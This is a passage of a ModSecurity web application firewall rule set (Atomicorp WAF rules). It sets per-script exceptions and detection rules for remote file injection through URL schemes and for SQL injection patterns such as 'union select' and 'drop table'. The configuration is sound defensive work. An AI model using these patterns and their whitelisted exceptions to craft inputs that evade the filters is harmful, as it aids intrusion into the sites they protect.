request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340490,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/private.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:message|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340491,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/private.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91070

SecRule REQUEST_FILENAME "/forums/newreply\.php" "phase:2,id:91071,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91072,t:none,pass,nolog,skipAfter:END_RULES_91072"

SecRule ARGS|!ARGS:weblink|!ARGS:weblink_title|!ARGS:message|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340492,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:weblink|!ARGS:weblink_title|!ARGS:message|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340493,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

# Rule 340444: Generic SQL sigs
SecRule ARGS|!ARGS:message "(?:\b(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table) |delete[[:space:]]*update.+set.+=)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhitespace,t:lowercase,id:340444,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"

SecMarker END_RULES_91072

SecRule REQUEST_FILENAME "/admin/area/add-edit\.php" "phase:2,id:91073,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91074,t:none,pass,nolog,skipAfter:END_RULES_91074"

SecRule ARGS|!ARGS:descripcion|!ARGS:description|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340494,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:descripcion|!ARGS:description|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340495,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91074

SecRule REQUEST_FILENAME "/links\.php" "phase:2,id:91075,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91076,t:none,pass,nolog,skipAfter:END_RULES_91076"

SecRule ARGS|!ARGS:S1|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:website|!ARGS:reciprocal|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340496,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/links.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:S1|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:website|!ARGS:reciprocal|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340497,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/links.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91076

SecRule REQUEST_FILENAME "/forums/newreply\.php" "phase:2,id:91077,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340156"
SecAction "phase:2,id:91078,t:none,pass,nolog,skipAfter:END_RULES_91078"

#Always bad SQL injection case w/ antievasion
SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:topicseen|!ARGS:message "\b(\d+) ?= ?\1\b|[\'\"](\w+)[\'\"] ?= ?[\'\"]\2\b" "id:340498,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/forums/newreply.php)',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"

SecMarker END_RULES_91078

SecRule REQUEST_FILENAME "/wysiwyg-edit" "phase:2,id:91079,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91080,t:none,pass,nolog,skipAfter:END_RULES_91080"

SecRule ARGS|!ARGS:PageCopy|!ARGS:S1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340499,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wysiwyg-edit)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:PageCopy|!ARGS:S1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340500,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wysiwyg-edit)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91080

SecRule REQUEST_FILENAME "/mt-comments\.cgi" "phase:2,id:91081,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91082,t:none,pass,nolog,skipAfter:END_RULES_91082"

SecRule ARGS|!ARGS:static|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340503,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/mt4/mt-comments.cgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:static|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340504,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/mt4/mt-comments.cgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91082

SecRule REQUEST_FILENAME "/ajax/check_mandatory_fields\.php" "phase:2,id:91083,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/admin/dogen_display\.php" "phase:2,id:91084,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340014,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340021,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340193,ctl:ruleRemovebyID=340011,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91085,t:none,pass,nolog,skipAfter:END_RULES_91085"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:/referrer/|!ARGS:headerfile|!ARGS:footerfile|!ARGS:insertfile|!ARGS:/file$/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340505,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/ubbthreads/admin/dogen_display.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:/referrer/|!ARGS:headerfile|!ARGS:footerfile|!ARGS:insertfile|!ARGS:/file$/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340506,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/ubbthreads/admin/dogen_display.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91085

SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:91086,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/app-modernbill-admin/clients\.php" "phase:2,id:91087,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91088,t:none,pass,nolog,skipAfter:END_RULES_91088"

SecRule ARGS|!ARGS:emailBody "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340509,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/modernbill5/app-modernbill-admin/clients.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:emailBody "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340510,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/modernbill5/app-modernbill-admin/clients.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91088

SecRule REQUEST_FILENAME "/cgi-bin/database/dbpro\.cgi" "phase:2,id:91089,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91090,t:none,pass,nolog,skipAfter:END_RULES_91090"

SecRule ARGS|!ARGS:admin_email_text "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340511,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/database/dbpro.cgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:admin_email_text "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340512,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/database/dbpro.cgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91090

SecRule REQUEST_FILENAME "/admin/patch\.php" "phase:2,id:91091,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340157"
SecAction "phase:2,id:91092,t:none,pass,nolog,skipAfter:END_RULES_91092"

SecRule ARGS|!ARGS:patch_query "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table) |delete[[:space:]]*update.+set.+=)" "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,id:340515,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/admin/patch.php)'"
SecRule REQUEST_URI|ARGS|!ARGS:patch_query "(?:(\w+)and(\w+)char\([0-9]+\)|(?:execute|convert)\(|(?:\;delete.*;(?:insert|declare|varchar)|(?:and .* \(select |(?:drop|create)(\w+)table|declare .* varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select |union all select )" "phase:2,deny,status:403,log,auditlog,id:344516,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,t:replaceComments,t:compressWhiteSpace,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (/admin/patch.php)',deny,log,auditlog,status:403,phase:2"

SecMarker END_RULES_91092

SecRule REQUEST_FILENAME "/images/logdnet\.php" "phase:2,id:91093,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91094,t:none,pass,nolog,skipAfter:END_RULES_91094"

SecRule ARGS|!ARGS:a|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340517,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/images/logdnet.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:a|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340518,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/images/logdnet.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91094

SecRule REQUEST_FILENAME "/contact_form\.php" "phase:2,id:91095,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91096,t:none,pass,nolog,skipAfter:END_RULES_91096"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:Comments|!ARGS:/^Explain_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340519,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/contact_form.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:Comments|!ARGS:/^Explain_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340520,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/contact_form.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91096

SecRule REQUEST_FILENAME "/forum/register\.php" "phase:2,id:91097,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91098,t:none,pass,nolog,skipAfter:END_RULES_91098"

